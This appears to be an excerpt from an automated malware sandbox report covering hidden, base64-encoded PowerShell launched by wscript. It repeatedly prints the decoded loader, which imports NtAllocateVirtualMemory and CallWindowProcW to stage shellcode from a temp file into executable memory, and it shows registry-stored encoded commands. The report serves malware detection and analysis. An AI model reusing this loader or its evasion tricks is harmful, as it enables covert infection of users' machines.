Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 7_2_00B8BAE2 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,

7_2_00B8BAE2

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D24E8A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LoadLibraryA,NtProtectVirtualMemory,		19_2_02D24E8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_03004E8A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LoadLibraryA,NtProtectVirtualMemory,		20_2_03004E8A

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded #Slag9 UNNOBLETOR supereleme hjemmehjl unnig COMPARAT HORTIKULT DRAINER Viktori1 Unla4 Potenti5 essenian scarphing BILESTO Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Opisthoc31{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);}"@#Adaptionsm9 cottidaeud knirkeri Lkkerfl9 FISKE Svve7 udadl ufrav Distribut6 TAGASS Manu Ubrligdu Cololi Test-Path "FLAS" $Opisthoc32="$env:temp" + "\Depopulato2.dat"#GASTUR behers ANTIP Chitino6 incorpor pullic Spinketce Sparrehy kontrab SVINEAVLEN konto Revalidend1 Sekun Myel Clysteriz4 Alalongaaf Arbitrate3 aftenhi STERI Erkl6 AGLOSSALBE Almeries3 Test-Path "BUREAUKRAT" $Opisthoc33=0;$Opisthoc39=1048576;$Opisthoc38=[Opisthoc31]::NtAllocateVirtualMemory(-1,[ref]$Opisthoc33,0,[ref]$Opisthoc39,12288,64)#stjmaaling fjerlet Twins BAJARIG Naturp Erseun progra Chinl Compi1 Mellemk Unscala
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded #Slag9 UNNOBLETOR supereleme hjemmehjl unnig COMPARAT HORTIKULT DRAINER Viktori1 Unla4 Potenti5 essenian scarphing BILESTO Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Opisthoc31{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);}"@#Adaptionsm9 cottidaeud knirkeri Lkkerfl9 FISKE Svve7 udadl ufrav Distribut6 TAGASS Manu Ubrligdu Cololi Test-Path "FLAS" $Opisthoc32="$env:temp" + "\Depopulato2.dat"#GASTUR behers ANTIP Chitino6 incorpor pullic Spinketce Sparrehy kontrab SVINEAVLEN konto Revalidend1 Sekun Myel Clysteriz4 Alalongaaf Arbitrate3 aftenhi STERI Erkl6 AGLOSSALBE Almeries3 Test-Path "BUREAUKRAT" $Opisthoc33=0;$Opisthoc39=1048576;$Opisthoc38=[Opisthoc31]::NtAllocateVirtualMemory(-1,[ref]$Opisthoc33,0,[ref]$Opisthoc39,12288,64)#stjmaaling fjerlet Twins BAJARIG Naturp Erseun progra Chinl Compi1 Mellemk Unscala
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded #Slag9 UNNOBLETOR supereleme hjemmehjl unnig COMPARAT HORTIKULT DRAINER Viktori1 Unla4 Potenti5 essenian scarphing BILESTO Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Opisthoc31{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);}"@#Adaptionsm9 cottidaeud knirkeri Lkkerfl9 FISKE Svve7 udadl ufrav Distribut6 TAGASS Manu Ubrligdu Cololi Test-Path "FLAS" $Opisthoc32="$env:temp" + "\Depopulato2.dat"#GASTUR behers ANTIP Chitino6 incorpor pullic Spinketce Sparrehy kontrab SVINEAVLEN konto Revalidend1 Sekun Myel Clysteriz4 Alalongaaf Arbitrate3 aftenhi STERI Erkl6 AGLOSSALBE Almeries3 Test-Path "BUREAUKRAT" $Opisthoc33=0;$Opisthoc39=1048576;$Opisthoc38=[Opisthoc31]::NtAllocateVirtualMemory(-1,[ref]$Opisthoc33,0,[ref]$Opisthoc39,12288,64)#stjmaaling fjerlet Twins BAJARIG Naturp Erseun progra Chinl Compi1 Mellemk Unscala
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded #Slag9 UNNOBLETOR supereleme hjemmehjl unnig COMPARAT HORTIKULT DRAINER Viktori1 Unla4 Potenti5 essenian scarphing BILESTO Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Opisthoc31{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);}"@#Adaptionsm9 cottidaeud knirkeri Lkkerfl9 FISKE Svve7 udadl ufrav Distribut6 TAGASS Manu Ubrligdu Cololi Test-Path "FLAS" $Opisthoc32="$env:temp" + "\Depopulato2.dat"#GASTUR behers ANTIP Chitino6 incorpor pullic Spinketce Sparrehy kontrab SVINEAVLEN konto Revalidend1 Sekun Myel Clysteriz4 Alalongaaf Arbitrate3 aftenhi STERI Erkl6 AGLOSSALBE Almeries3 Test-Path "BUREAUKRAT" $Opisthoc33=0;$Opisthoc39=1048576;$Opisthoc38=[Opisthoc31]::NtAllocateVirtualMemory(-1,[ref]$Opisthoc33,0,[ref]$Opisthoc39,12288,64)#stjmaaling fjerlet Twins BAJARIG Naturp Erseun progra Chinl Compi1 Mellemk Unscala	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded #Slag9 UNNOBLETOR supereleme hjemmehjl unnig COMPARAT HORTIKULT DRAINER Viktori1 Unla4 Potenti5 essenian scarphing BILESTO Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Opisthoc31{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);}"@#Adaptionsm9 cottidaeud knirkeri Lkkerfl9 FISKE Svve7 udadl ufrav Distribut6 TAGASS Manu Ubrligdu Cololi Test-Path "FLAS" $Opisthoc32="$env:temp" + "\Depopulato2.dat"#GASTUR behers ANTIP Chitino6 incorpor pullic Spinketce Sparrehy kontrab SVINEAVLEN konto Revalidend1 Sekun Myel Clysteriz4 Alalongaaf Arbitrate3 aftenhi STERI Erkl6 AGLOSSALBE Almeries3 Test-Path "BUREAUKRAT" $Opisthoc33=0;$Opisthoc39=1048576;$Opisthoc38=[Opisthoc31]::NtAllocateVirtualMemory(-1,[ref]$Opisthoc33,0,[ref]$Opisthoc39,12288,64)#stjmaaling fjerlet Twins BAJARIG Naturp Erseun progra Chinl Compi1 Mellemk Unscala	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded #Slag9 UNNOBLETOR supereleme hjemmehjl unnig COMPARAT HORTIKULT DRAINER Viktori1 Unla4 Potenti5 essenian scarphing BILESTO Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Opisthoc31{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);}"@#Adaptionsm9 cottidaeud knirkeri Lkkerfl9 FISKE Svve7 udadl ufrav Distribut6 TAGASS Manu Ubrligdu Cololi Test-Path "FLAS" $Opisthoc32="$env:temp" + "\Depopulato2.dat"#GASTUR behers ANTIP Chitino6 incorpor pullic Spinketce Sparrehy kontrab SVINEAVLEN konto Revalidend1 Sekun Myel Clysteriz4 Alalongaaf Arbitrate3 aftenhi STERI Erkl6 AGLOSSALBE Almeries3 Test-Path "BUREAUKRAT" $Opisthoc33=0;$Opisthoc39=1048576;$Opisthoc38=[Opisthoc31]::NtAllocateVirtualMemory(-1,[ref]$Opisthoc33,0,[ref]$Opisthoc39,12288,64)#stjmaaling fjerlet Twins BAJARIG Naturp Erseun progra Chinl Compi1 Mellemk Unscala	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATg
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand 